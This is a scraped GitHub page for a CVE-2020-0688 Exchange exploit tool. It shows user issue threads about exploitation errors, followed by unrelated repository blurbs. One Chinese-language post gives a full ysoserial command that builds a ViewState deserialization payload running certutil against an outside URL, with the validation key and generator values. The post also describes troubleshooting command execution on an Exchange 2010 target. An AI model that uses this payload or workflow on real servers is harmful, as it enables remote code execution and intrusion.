zcgonvh / cve-2020-0688 Goto Github PK
View Code? Open in Web Editor NEWExploit and detect tools for CVE-2020-0688
Exploit and detect tools for CVE-2020-0688
Done
RemoteStub.cs, what i can do with it? Is it a example for the new ActivitySurrogateSelectorGenerator gadget? More detail please.
When I have a test on exchange 2016, "exec whoami" returns
System.ComponentModel.Win32Exception(0x80004005):?????
? System.Diagnostics.Process.StartWithCreateProcess(ProcessStartInfo,startInfo)
? Zcg.GMHFuckTools.ExampleStub.IISRemoteStub.Run(String proc, String arg)
Emmm, Could u plz give me some advice?
[x]error:
System.Net.WebException: The remote server returned an error: (500) Internal Server Error.
at System.Net.HttpWebRequest.GetResponse()
at Zcg.Exploit.Remote.ExchangeCmd.Main(String[] args)
Why?
背景:因多个攻击者进行复现发起测试端口外连等操作导致线程锁死无法执行任何命令。
最初状态:可执行ping触发dnslog等命令。
现阶段:无法执行任何命令。
使用ExchangeDetect可以测试出存在漏洞。但是使用ExchangeCmd无法写入文件到LiveIdError.aspx。直接访问LiveIdError.aspx服务器会302跳转到 /ecp/error.aspx?aspxerrorpath=/ecp/LiveIdError.aspx 然后触发服务器500的错误。
之前是使用了certutil.exe 去测试端口连接性。使用的是手工的方式。去生成反序列化内容。
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c certutil.exe http://bbbbbbbbbb" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="xxxx" --islegacy -isdebug
目标环境证实可以执行命令。但现在无法执行有什么比较好的办法解决这个问题吗? 感谢
环境:server 2012 r2
exchange 2010 sp3
fidder 抓包:X-AspNet-Version: 2.0.50727
X-OWA-Version: 14.3.123.3
1.测试写入空白LiveIdError.aspx失败,返回值500,server端ecp目录LiveIdError.aspx没有创建成功。
2.在server端提前建立好LiveIdError.aspx,可测试成功。
写入LiveIdError.aspx源码被编译为stub,求助能否提供这段代码,或测试下exchange2010,谢谢。
执行命令时报bad resault
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.